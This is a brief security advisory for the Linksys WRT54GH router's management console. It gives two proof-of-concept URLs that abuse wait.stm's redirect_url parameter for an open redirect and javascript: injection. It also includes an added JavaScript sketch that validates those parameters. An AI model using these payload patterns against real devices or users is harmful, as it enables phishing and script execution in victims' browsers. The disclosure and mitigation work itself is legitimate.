Nishant Das Patnaik

# TITLE: Linksys WRT54GH Web Management Console URL Redirection & Code Execution

# DATE: 12/09/2010

# AUTHOR: Nishant Das Patnaik [Web: http://nishantdaspatnaik.yolasite.com]

# DOWNLOAD: N.A.

# F/W VERSION: 1.0.00 Build 005

# TESTED ON: Linksys WRT54GH with Firmware v 1.0.00 build 005

# CODE:

http://192.168.1.1/wait.stm?redirect_url=http://www.google.co.in&delay_time=0
http://192.168.1.1/wait.stm?redirect_url=javascript:document.location='http://www.google.co.in';&delay_time=0

# NOTE: An attacker can use this URL to execute JavaScript in the client's browser, or to redirect the client to a malicious site for phishing or other browser-based attacks.
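
# MITIGATION EXAMPLE: Added example, not part of the original advisory and not Linksys firmware code. It sketches how a handler for wait.stm could validate redirect_url and delay_time so that both URLs above fall back to a safe default. ROUTER_ORIGIN, the function names, the 60-second cap and example.stm are assumptions made for illustration.

```javascript
// Assumption: redirects issued by the management console only ever need to
// point back at the console itself.
const ROUTER_ORIGIN = "http://192.168.1.1";

// Returns a same-origin path (plus query) or the fallback. Never returns an
// absolute URL, so the caller cannot be steered off the device.
function safeRedirectTarget(raw, fallback = "/") {
  if (typeof raw !== "string" || raw.length === 0 || raw.length > 256) return fallback;
  // URL parsers drop tab/CR/LF and treat "\" as "/", so "java<TAB>script:" and
  // "/\host" would normalise into dangerous forms. Reject them up front.
  if (/[\u0000-\u0020\u007f\\]/.test(raw)) return fallback;
  let url;
  try {
    url = new URL(raw, ROUTER_ORIGIN + "/");
  } catch {
    return fallback;
  }
  // Blocks javascript:, data:, vbscript: and any other non-HTTP scheme.
  if (url.protocol !== "http:" && url.protocol !== "https:") return fallback;
  // Blocks absolute and protocol-relative ("//host") off-site targets.
  if (url.origin !== ROUTER_ORIGIN) return fallback;
  if (url.username || url.password) return fallback;
  return url.pathname + url.search;
}

// delay_time must be a small non-negative integer; anything else becomes 0.
function safeDelay(raw, max = 60) {
  if (!/^\d{1,3}$/.test(String(raw))) return 0;
  return Math.min(Number(raw), max);
}

// Parses the query string of a wait.stm request into validated values.
function sanitizeWaitQuery(query) {
  const params = new URLSearchParams(query);
  return {
    redirect: safeRedirectTarget(params.get("redirect_url")),
    delay: safeDelay(params.get("delay_time")),
  };
}

// The two query strings from this advisory, plus one constructed benign case.
for (const q of [
  "redirect_url=http://www.google.co.in&delay_time=0",
  "redirect_url=javascript:document.location='http://www.google.co.in';&delay_time=0",
  "redirect_url=/example.stm&delay_time=5", // constructed sample
]) {
  console.log(q, "->", JSON.stringify(sanitizeWaitQuery(q)));
}
```

The returned path should still be HTML- and script-encoded for the context in which the page writes it out.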

# REFERENCE: http://www.linksysbycisco.com/APAC/en/support/WRT54GH